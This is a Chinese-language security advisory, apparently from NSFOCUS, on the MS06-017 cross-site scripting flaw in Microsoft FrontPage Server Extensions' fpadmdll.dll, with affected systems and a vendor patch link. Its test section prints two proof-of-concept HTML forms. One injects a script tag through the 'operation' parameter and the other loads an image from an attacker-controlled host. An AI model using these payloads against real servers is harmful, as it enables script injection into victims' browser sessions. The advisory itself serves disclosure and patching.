安全研究

安全漏洞
Microsoft FrontPage Server Extensions跨站脚本漏洞(MS06-017)

发布日期:2006-04-11
更新日期:2006-04-12

受影响系统:
Microsoft Microsoft SharePoint Team Services
Microsoft FrontPage Server Extensions 2002
    - Microsoft Windows XP SP2
    - Microsoft Windows XP SP1
    - Microsoft Windows Server 2003 SP1
    - Microsoft Windows Server 2003
    - Microsoft Windows 2000 SP4
描述:
BUGTRAQ  ID: 17452
CVE(CAN) ID: CVE-2006-0015

FrontPage Server Extensions为FrontPage服务扩展,与IIS一起使用可以方便的支持管理、创建以及浏览FrontPage扩展的网站。

FrontPage Server Extensions对HTML页面的处理存在输入验证漏洞,远程攻击者可能在客户机器上执行任意脚本代码。

FrontPage Server Extensions的fpadmdll.dll中的一些参数没有正确的过滤返回给用户的特定输入,导致跨站脚本问题,可能允许攻击者以当前会话权限以客户机的浏览器中执行恶意脚本代码,利用这个漏洞必须用户交互。

fpadmdll.dll中有漏洞的参数是operation、command和name。这些参数没有经过正确的过滤便出现在了输出中,但可通过“-->”转义。

<*来源:Esteban Martínez Fayó (secemf@gmail.com
  
  链接:http://secunia.com/advisories/19623/print/
        http://marc.theaimsgroup.com/?l=bugtraq&m=114487846329000&w=2
        http://www.microsoft.com/technet/security/Bulletin/MS06-017.mspx?pf=true
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

攻击者可以创建POST到FPSE服务器的FROM,并在客户端系统执行脚本。

<form action=http://iisserver/_vti_bin/_vti_adm/fpadmdll.dll method="POST">
<input type="hidden" name="operation" value="--><script>alert()</script>">
<input type="hidden" name="action" value="none">
<input type="hidden" name="port" value="/LM/W3SVC/1:">
<input type="submit" name="page" value="healthrp.htm">
</form>

此外,攻击者还可以从控制的站点注入图形。

<form action=http://iisserver/_vti_bin/_vti_adm/fpadmdll.dll method="POST">
<input type="hidden" name="operation" value="--><img src=http://hackersite/image.jpg>">
<input type="hidden" name="action" value="none">
<input type="hidden" name="port" value="/LM/W3SVC/1:">
<input type="submit" name="page" value="healthrp.htm">
</form>

建议:
厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS06-017)以及相应补丁:
MS06-017:Vulnerability in Microsoft FrontPage Server Extensions Could Allow Cross-Site Scripting (917627)
链接:http://www.microsoft.com/technet/security/Bulletin/MS06-017.mspx?pf=true

浏览次数:3714
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障